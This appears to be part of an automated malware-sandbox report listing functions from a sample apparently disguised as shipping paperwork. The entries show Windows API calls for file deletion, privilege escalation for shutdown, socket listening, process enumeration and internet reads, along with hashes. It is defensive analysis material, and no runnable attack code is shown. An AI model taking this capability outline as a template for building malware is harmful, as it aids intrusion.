                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                • String ID: *.*
                                                                • API String ID: 713712311-438819550
                                                                • Opcode ID: 6ba2ec9d92575ac7bd5c42746d9788b79df854b5381ad6a350d60c68a3615965
                                                                • Instruction ID: db14594a2c008d04f5dfafa599d59c14677b59b06feb6fb048504e5eaf8a5853
                                                                • Opcode Fuzzy Hash: 6ba2ec9d92575ac7bd5c42746d9788b79df854b5381ad6a350d60c68a3615965
                                                                • Instruction Fuzzy Hash: 9D416D7190421A9BCF14DFA8CC59AFEBBB8FF44310F144566F819A3291EB309A44CF61
                                                                Function 00945760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove
                                                                • String ID:
                                                                • API String ID: 4104443479-0
                                                                • Opcode ID: a9e4835836f1465f98df5d4c900174aa64c7f5a49106cc543b6d7623ef2ba143
                                                                • Instruction ID: 7dc887e04f8b9c45c947899d0a1f98f55d210af1a5d9d312d3109a9bf43c9f4b
                                                                • Opcode Fuzzy Hash: a9e4835836f1465f98df5d4c900174aa64c7f5a49106cc543b6d7623ef2ba143
                                                                • Instruction Fuzzy Hash: BA126A70A00609DFDF14DFA5D981AEEB7F5FF88300F214529E846A7291EB36AD19CB50
                                                                Function 00993B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
                                                                  • Part of subcall function 00994A31: GetFileAttributesW.KERNEL32(?,0099370B), ref: 00994A32
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00993B89
                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00993BD9
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00993BEA
                                                                • FindClose.KERNEL32(00000000), ref: 00993C01
                                                                • FindClose.KERNEL32(00000000), ref: 00993C0A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                • String ID: \*.*
                                                                • API String ID: 2649000838-1173974218
                                                                • Opcode ID: a0783e3c5b5a439548b956c7492d71dd7e901178712ef09f2cc809354e931287
                                                                • Instruction ID: 619704c32a6f97556b2e58550cbd6dae157f4950b5dc29653bbbc48d59bf99e6
                                                                • Opcode Fuzzy Hash: a0783e3c5b5a439548b956c7492d71dd7e901178712ef09f2cc809354e931287
                                                                • Instruction Fuzzy Hash: 1931A03101C384ABCB01EF68C8919AFB7ECAE95314F444E2DF4D593191EB20DA08CB63
                                                                Function 009951BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 009887E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098882B
                                                                  • Part of subcall function 009887E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00988858
                                                                  • Part of subcall function 009887E1: GetLastError.KERNEL32 ref: 00988865
                                                                • ExitWindowsEx.USER32(?,00000000), ref: 009951F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                • String ID: $@$SeShutdownPrivilege
                                                                • API String ID: 2234035333-194228
                                                                • Opcode ID: 40cb762e600da53c91d66392a6879aedee5c423c4c898588aa907477f995f091
                                                                • Instruction ID: 820947c515c5191a0da9f33f9d4351da6f25b6e3f3313afb80148124882cf3bb
                                                                • Opcode Fuzzy Hash: 40cb762e600da53c91d66392a6879aedee5c423c4c898588aa907477f995f091
                                                                • Instruction Fuzzy Hash: 7201F7317A96116BEF2A677CAC9AFBF725C9B05750F220920F927E21D2D9615C0087A0
                                                                Function 009A6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009A62DC
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A62EB
                                                                • bind.WSOCK32(00000000,?,00000010), ref: 009A6307
                                                                • listen.WSOCK32(00000000,00000005), ref: 009A6316
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A6330
                                                                • closesocket.WSOCK32(00000000,00000000), ref: 009A6344
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                • String ID:
                                                                • API String ID: 1279440585-0
                                                                • Opcode ID: c14a0a107ad73c96abcb33b728b662aa8f70ce797d55c383b540c73d730b07e6
                                                                • Instruction ID: 0fe569599bba6a1939e1c174d08fe2e1fddd64416ca1f8f0a7941207abf065f4
                                                                • Opcode Fuzzy Hash: c14a0a107ad73c96abcb33b728b662aa8f70ce797d55c383b540c73d730b07e6
                                                                • Instruction Fuzzy Hash: 3121A0356002049FCF10EF64CD99B6EB7B9EF89720F184269F816A7391CB70AD41DB91
                                                                Function 00945520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00950DB6: std::exception::exception.LIBCMT ref: 00950DEC
                                                                  • Part of subcall function 00950DB6: __CxxThrowException@8.LIBCMT ref: 00950E01
                                                                • _memmove.LIBCMT ref: 00980258
                                                                • _memmove.LIBCMT ref: 0098036D
                                                                • _memmove.LIBCMT ref: 00980414
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 1300846289-0
                                                                • Opcode ID: ff3f146733e7713964fd9dc3146088295ba3bc4858e6ce8b9749bfda5d727685
                                                                • Instruction ID: 16f2142d057c59d3ce04022dae045604d887a75fc63fa4c9f431b16f9042df18
                                                                • Opcode Fuzzy Hash: ff3f146733e7713964fd9dc3146088295ba3bc4858e6ce8b9749bfda5d727685
                                                                • Instruction Fuzzy Hash: 5902A2B0A00209DBCF04DFA5D981AAEBBB5FF84310F158469E80ADB395EB35DD54CB91
                                                                Function 00931287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 009319FA
                                                                • GetSysColor.USER32(0000000F), ref: 00931A4E
                                                                • SetBkColor.GDI32(?,00000000), ref: 00931A61
                                                                  • Part of subcall function 00931290: DefDlgProcW.USER32(?,00000020,?), ref: 009312D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ColorProc$LongWindow
                                                                • String ID:
                                                                • API String ID: 3744519093-0
                                                                • Opcode ID: 676b8bfc74c25f9affd87e1d12d4cb2d3e754a66da65e1ace3a6d52077f9aacf
                                                                • Instruction ID: 37e52b8a79e0c2c130eb45b02a57e7e82d984b17b51805ac852530058eb9d551
                                                                • Opcode Fuzzy Hash: 676b8bfc74c25f9affd87e1d12d4cb2d3e754a66da65e1ace3a6d52077f9aacf
                                                                • Instruction Fuzzy Hash: C2A19EB1116544BEE738AB289C44FBF359CDF81397F14061AF502D61B2DB289D41DEB1
                                                                Function 0099BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0099BCE6
                                                                • _wcscmp.LIBCMT ref: 0099BD16
                                                                • _wcscmp.LIBCMT ref: 0099BD2B
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0099BD3C
                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0099BD6C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                                • String ID:
                                                                • API String ID: 2387731787-0
                                                                • Opcode ID: 45c040c50ea09c56c509001173a034c8c33462773835c070033363a3022116fe
                                                                • Instruction ID: 705306d98dcd4a983a993c83c329095b40113c2c9dee04719ccd1cc881a64768
                                                                • Opcode Fuzzy Hash: 45c040c50ea09c56c509001173a034c8c33462773835c070033363a3022116fe
                                                                • Instruction Fuzzy Hash: DA51ACB56046029FCB14DF68D591EAAB3E8EF89324F10461DF95A8B3A1DB34ED04CF91
                                                                Function 009A6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 009A7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009A7DB6
                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009A679E
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A67C7
                                                                • bind.WSOCK32(00000000,?,00000010), ref: 009A6800
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A680D
                                                                • closesocket.WSOCK32(00000000,00000000), ref: 009A6821
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                • String ID:
                                                                • API String ID: 99427753-0
                                                                • Opcode ID: fbd878f3bd5f4c79d10a7ed1e8edd4a47c314f3d4304de32573afc762e7a3de3
                                                                • Instruction ID: 3a3cc76d8224e17fdae8c0351bc19e88d5b235019ed1225c94da04511c07bae4
                                                                • Opcode Fuzzy Hash: fbd878f3bd5f4c79d10a7ed1e8edd4a47c314f3d4304de32573afc762e7a3de3
                                                                • Instruction Fuzzy Hash: EA41A475B00210AFDB50BF689C86F7E77A8DF85724F048558F91AAB3D2CAB49D008F91
                                                                Function 009B5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                • String ID:
                                                                • API String ID: 292994002-0
                                                                • Opcode ID: 862b4278abda055f63797c73a64ea367ff6c6eafa12b1483faf34384c1b8d244
                                                                • Instruction ID: 0efaac2c72a1f7d92c676e37a60b38bfbdbcc8dbdc7cae18a44118f3a5e05752
                                                                • Opcode Fuzzy Hash: 862b4278abda055f63797c73a64ea367ff6c6eafa12b1483faf34384c1b8d244
                                                                • Instruction Fuzzy Hash: A5110131300914AFEB216F269D44BAEBBDDEF847B0F024428F806D3341CBB0DC018AA0
                                                                Function 009880A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009880C0
                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009880CA
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009880D9
                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009880E0
                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009880F6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 44706859-0
                                                                • Opcode ID: 3802a089dafc229620d61eee885b09210a0db0995620bd877e2683ff46865cf6
                                                                • Instruction ID: 31e22a300ed93ef22f591cd97187496737155bdac66be4336021845e20c1c4fb
                                                                • Opcode Fuzzy Hash: 3802a089dafc229620d61eee885b09210a0db0995620bd877e2683ff46865cf6
                                                                • Instruction Fuzzy Hash: A0F0627126C205BFEB102FA9EC9DE673BACEF49765B400529F945C6260CF619C41EB70
                                                                Function 0099C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0099C432
                                                                • CoCreateInstance.OLE32(009C2D6C,00000000,00000001,009C2BDC,?), ref: 0099C44A
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • CoUninitialize.OLE32 ref: 0099C6B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                • String ID: .lnk
                                                                • API String ID: 2683427295-24824748
                                                                • Opcode ID: 11ff6e916b62c3cec16a043cebc495b7e1013f068217cbb527d382dfebdbf1d3
                                                                • Instruction ID: fc02b855b4372280fbe5adf155bebaf5fe8a473a5f0d6b65f9f5275eafe2c857
                                                                • Opcode Fuzzy Hash: 11ff6e916b62c3cec16a043cebc495b7e1013f068217cbb527d382dfebdbf1d3
                                                                • Instruction Fuzzy Hash: C9A118B1108205AFD700EF54C891FABB7E8EFD9354F00492CF5569B1A2EB71AA09CF52
                                                                Function 00934B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00934AD0), ref: 00934B45
                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00934B57
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                • API String ID: 2574300362-192647395
                                                                • Opcode ID: 32017ed1df78b6b6eb88849f18765d9980f515aaefa70c86e098ef60f0fd33e9
                                                                • Instruction ID: 9537caf47d373b5997e98f4621944f0d678cf465fe2163cb56345c129761ba94
                                                                • Opcode Fuzzy Hash: 32017ed1df78b6b6eb88849f18765d9980f515aaefa70c86e098ef60f0fd33e9
                                                                • Instruction Fuzzy Hash: 40D0C230A24323CFC7208F3ADD38B46B2E8AF40360F11CC39D485C6150D774E480CA14
                                                                Function 00943030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __itow__swprintf
                                                                • String ID:
                                                                • API String ID: 674341424-0
                                                                • Opcode ID: 9fb6984347ca17d4506258d3754fb1b5bd5c2e391f7f828acdb95a01c1d549e1
                                                                • Instruction ID: 65255433028fd3326fffe1f6e70fa1eedfe6935430e573ad04b1fb59e86e6d59
                                                                • Opcode Fuzzy Hash: 9fb6984347ca17d4506258d3754fb1b5bd5c2e391f7f828acdb95a01c1d549e1
                                                                • Instruction Fuzzy Hash: 05228B716087019FC724DF24C891BAEB7E8AFC4710F14892DF99A97291DB75EA04CF92
                                                                Function 009AEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 009AEE3D
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 009AEE4B
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • Process32NextW.KERNEL32(00000000,?), ref: 009AEF0B
                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 009AEF1A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                • String ID:
                                                                • API String ID: 2576544623-0
                                                                • Opcode ID: c63c616302033bca5cedb5f1a1134eb06071e9997be5f7d5c3f137ef2842f2b1
                                                                • Instruction ID: 2314ac720a5b5eb8eefdca360a2a3ddf1c287e5e9f8f82f8aca9ce9e68245c4f
                                                                • Opcode Fuzzy Hash: c63c616302033bca5cedb5f1a1134eb06071e9997be5f7d5c3f137ef2842f2b1
                                                                • Instruction Fuzzy Hash: BA515BB1508311AFD320EF24DC81B6BB7E8EFD9710F50492DF595972A1EB70A904CB92
                                                                Function 0098E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0098E628
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: ($|
                                                                • API String ID: 1659193697-1631851259
                                                                • Opcode ID: 4b2747c917096c7fe3015f8d993cccbd4fc71eabfe40844e8521b38399ace605
                                                                • Instruction ID: 69ffbb295b4bc297c1d7a727d3d779d69f98fc8523e6e20d954075f13545a37a
                                                                • Opcode Fuzzy Hash: 4b2747c917096c7fe3015f8d993cccbd4fc71eabfe40844e8521b38399ace605
                                                                • Instruction Fuzzy Hash: EB323475A007059FDB28DF59C491AAAB7F0FF48320B15C56EE89ADB3A1E770E941CB40
                                                                Function 009A22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009A180A,00000000), ref: 009A23E1
                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009A2418
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
